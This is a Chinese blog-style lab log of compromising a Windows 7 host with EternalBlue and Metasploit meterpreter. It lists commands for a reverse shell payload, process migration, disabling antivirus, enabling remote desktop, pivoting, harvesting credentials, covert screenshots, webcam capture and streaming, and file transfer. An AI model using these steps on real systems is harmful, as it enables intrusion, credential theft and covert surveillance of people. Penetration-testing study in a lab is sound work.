1、(信息收集)记录一次使用永恒之蓝的渗透过程

一、通过nmap扫描得知目标机开放了445端口,运行的操作版本为WIN7
1、(信息收集)记录一次使用永恒之蓝的渗透过程_第1张图片2、尝试使用永恒之蓝进行渗透
在这里插入图片描述
使用windows/x64/meterpreter/reverse_tcp PAYLOAD
设置好各项参数
成功进入meterperter工具
使用getpid获取Meterpreter Shell的进程号
在这里插入图片描述
继续使用ps查看本机运行的进程,选择一个稳定的系统进程,将shell迁移过去
1、(信息收集)记录一次使用永恒之蓝的渗透过程_第2张图片3、或者使用自动迁移命令 run post/windows/manage/migrate
1、(信息收集)记录一次使用永恒之蓝的渗透过程_第3张图片
4、获取目标机系统信息,查看是否运行在虚拟机上,查询运行时间,查看完整网络设置
1、(信息收集)记录一次使用永恒之蓝的渗透过程_第4张图片
5、关闭目标机器杀毒软件,开启远程桌面
1、(信息收集)记录一次使用永恒之蓝的渗透过程_第5张图片6、添加一条路由,然后就可以借助被攻陷的主机对其他网络进行攻击了。列举当前有多少用户登陆了目标机,可以看到用户XinSai在登录中。
1、(信息收集)记录一次使用永恒之蓝的渗透过程_第6张图片7、列举安装在目标机上的应用程序
1、(信息收集)记录一次使用永恒之蓝的渗透过程_第7张图片8、抓取自动登录的用户名和密码
在这里插入图片描述木有设置自动登录密码下去试试

9、屏幕截图与录像直播
1、load espia 插件,然后输入screengrab或者screenshot获取截图
然后使用’eog+照片path’即可查看,eog,即linux的内置图片查看器 eye of gmone 的缩写。
1、(信息收集)记录一次使用永恒之蓝的渗透过程_第8张图片
webcam_list查看目标机摄像头列表
webcam_snap打开摄像头并拍一张照片
webcam_stream开启直播模式,使用file:///root/xxx.html查看直播

shell进入目标机Shell下面,由于Linux和Windows编码不同会乱码,使用chcp 65001解决,exit结束会话。
search -f *.txt -d c:\ #搜索c盘中所有以.txt为后缀的文件 -f 搜索模式 -d 指定目录。
download c:\test.txt /root
upload /root/test.txt c:\

你可能感兴趣的:(Metasploit)